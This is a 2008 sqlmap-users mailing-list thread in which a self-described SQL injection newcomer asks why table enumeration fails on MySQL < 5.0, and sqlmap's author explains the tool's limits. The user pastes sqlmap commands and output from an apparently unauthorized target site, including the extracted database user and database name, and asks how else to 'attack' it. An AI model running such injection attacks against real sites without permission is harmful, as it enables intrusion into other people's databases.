sqlmap-users

[sqlmap-users] MySQL < 5.0.0

[Freeman Y. <fre...@la...>]

Am I still not able to enumerate tables in a DB even though i have the 
DB name in MySQL 5.0.0?

I understand that I cannot get a list of DBs because of no 
information_schema, but even if I have a DB name I cannot enumerate the 
tables?
If not, how else can I attack a 5.0.0 server?

Thanks

Re: [sqlmap-users] MySQL < 5.0.0

[Bernardo D. A. G. <ber...@gm...>]

Hi Freeman,

On Tue, Oct 21, 2008 at 07:17, Freeman Y. <fre...@la...> wrote:
> Am I still not able to enumerate tables in a DB even though i have the
> DB name in MySQL 5.0.0?

In a default configuration of MySQL >= 5.0 there is the
information_schema system database which sqlmap uses to enumerate DB,
tables, etc.

> I understand that I cannot get a list of DBs because of no
> information_schema, but even if I have a DB name I cannot enumerate the
> tables?
> If not, how else can I attack a 5.0.0 server?

If you read the documentation carefully, or even just run sqlmap with
-h option, you see that you can provide the DB name with -D option
together with the --tables option to enumerate its tables.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] MySQL < 5.0.0

[Freeman Y. <fre...@la...>]

Bernardo Damele A. G. wrote:
> Hi Freeman,
>
> On Tue, Oct 21, 2008 at 07:17, Freeman Y. <fre...@la...> wrote:
>   
>> Am I still not able to enumerate tables in a DB even though i have the
>> DB name in MySQL 5.0.0?
>>     
>
> In a default configuration of MySQL >= 5.0 there is the
> information_schema system database which sqlmap uses to enumerate DB,
> tables, etc.
>
>   
>> I understand that I cannot get a list of DBs because of no
>> information_schema, but even if I have a DB name I cannot enumerate the
>> tables?
>> If not, how else can I attack a 5.0.0 server?
>>     
>
> If you read the documentation carefully, or even just run sqlmap with
> -h option, you see that you can provide the DB name with -D option
> together with the --tables option to enumerate its tables.
>
> Cheers,
>   
Thanks but I already tried that. Here's the output with the site removed:

/C:\sqlmap>sqlmap -u http://somerandomsite/index.php?id=123 -v 1 --curre
nt-db --current-user

    sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
                        and Daniele Bellucci <dan...@gm...>

[*] starting at: 16:26:47

[16:26:47] [INFO] testing connection to the target url
[...]
back-end DBMS:  MySQL < 5.0.0

[16:27:42] [INFO] fetching current user
[16:27:42] [INFO] query: IFNULL(CAST(CURRENT_USER() AS CHAR(10000)), 
CHAR(32))
[16:27:42] [INFO] retrieved: hyweljen_db@localhost
[16:30:33] [INFO] performed 153 queries in 171 seconds
current user:    'hyweljen_db@localhost'

[16:30:33] [INFO] fetching current database
[16:30:33] [INFO] query: IFNULL(CAST(DATABASE() AS CHAR(10000)), CHAR(32))
[16:30:33] [INFO] retrieved: hyweljen_diverse
[16:32:38] [INFO] performed 118 queries in 125 seconds
current database:    'hyweljen_diverse'

[16:32:38] [INFO] Fetched data logged to text files under 
'C:\sqlmap/output\randomsite'

[*] shutting down at: 16:32:38/

So I've found out that the database is hyweljen_diverse.. then I run this:
/
C:\sqlmap>sqlmap -u http://somerandomsite/index.php?id=123 -v 1 --eta -
-threads=2 -D hyweljen_diverse --tables

    sqlmap/0.6.1 coded by Bernardo Damele A. G. <ber...@gm...>
                        and Daniele Bellucci <dan...@gm...>

[*] starting at: 16:35:20

[16:35:20] [INFO] testing connection to the target url
[...]
[16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
[16:36:06] [INFO] retrieved:
[16:36:11] [INFO] performed 6 queries in 5 seconds
back-end DBMS:  MySQL < 5.0.0

[16:36:11] [ERROR] information_schema not available, back-end DBMS is 
MySQL < 5.
0

[*] shutting down at: 16:36:11/

If you look I did use -D and then --tables. What am I doing wrong?

Thanks

Re: [sqlmap-users] MySQL < 5.0.0

[Bernardo D. A. G. <ber...@gm...>]

Hi Freeman,

On Wed, Oct 22, 2008 at 00:40, Freeman Y. <fre...@la...> wrote:
> ...
> [...]
> [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
> [16:36:06] [INFO] retrieved:
> [16:36:11] [INFO] performed 6 queries in 5 seconds
> back-end DBMS:  MySQL < 5.0.0
>
> [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL
> < 5.
> 0
>
> [*] shutting down at: 16:36:11
>
> If you look I did use -D and then --tables. What am I doing wrong?

As you can see from sqlmap messages, the remote DBMS is MySQL < 5.0 so
it has not information_schema. If you assume it is MySQL >= 5.0 so the
current user does not have access to the information_schema system
database.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F

Re: [sqlmap-users] MySQL < 5.0.0

[Freeman Y. <fre...@la...>]

Bernardo Damele A. G. wrote:
> Hi Freeman,
>
> On Wed, Oct 22, 2008 at 00:40, Freeman Y. <fre...@la...> wrote:
>   
>> ...
>> [...]
>> [16:36:06] [INFO] query: SELECT 0 FROM information_schema.TABLES LIMIT 0, 1
>> [16:36:06] [INFO] retrieved:
>> [16:36:11] [INFO] performed 6 queries in 5 seconds
>> back-end DBMS:  MySQL < 5.0.0
>>
>> [16:36:11] [ERROR] information_schema not available, back-end DBMS is MySQL
>> < 5.
>> 0
>>
>> [*] shutting down at: 16:36:11
>>
>> If you look I did use -D and then --tables. What am I doing wrong?
>>     
>
> As you can see from sqlmap messages, the remote DBMS is MySQL < 5.0 so
> it has not information_schema. If you assume it is MySQL >= 5.0 so the
> current user does not have access to the information_schema system
> database.
>
> Cheers,
>   
Sorry I was mistaken, I thought that if I had the DB name then it could 
enumerate the tables  with -D tablename and --tables even if MySQL is < 5.0.

Do you have any suggestions as how to attack this type of DB then?
I'm somewhat new to SQL injections, please bear with me :)

Thanks for your help!

Re: [sqlmap-users] MySQL < 5.0.0

[Bernardo D. A. G. <ber...@gm...>]

Hi Freeman,

On Wed, Oct 22, 2008 at 09:33, Freeman Y. <fre...@la...> wrote:
> ...
> Sorry I was mistaken, I thought that if I had the DB name then it could
> enumerate the tables  with -D tablename and --tables even if MySQL is < 5.0.

I will improve it in sqlmap 0.7. For the moment no table/column
enumeration is possible on MySQL < 5.0 even if you provide the DB
name.

Cheers,
-- 
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobiles: +39-3493821385 (IT), +44-(0)7788962949 (UK)
PGP Key ID: 0x05F5A30F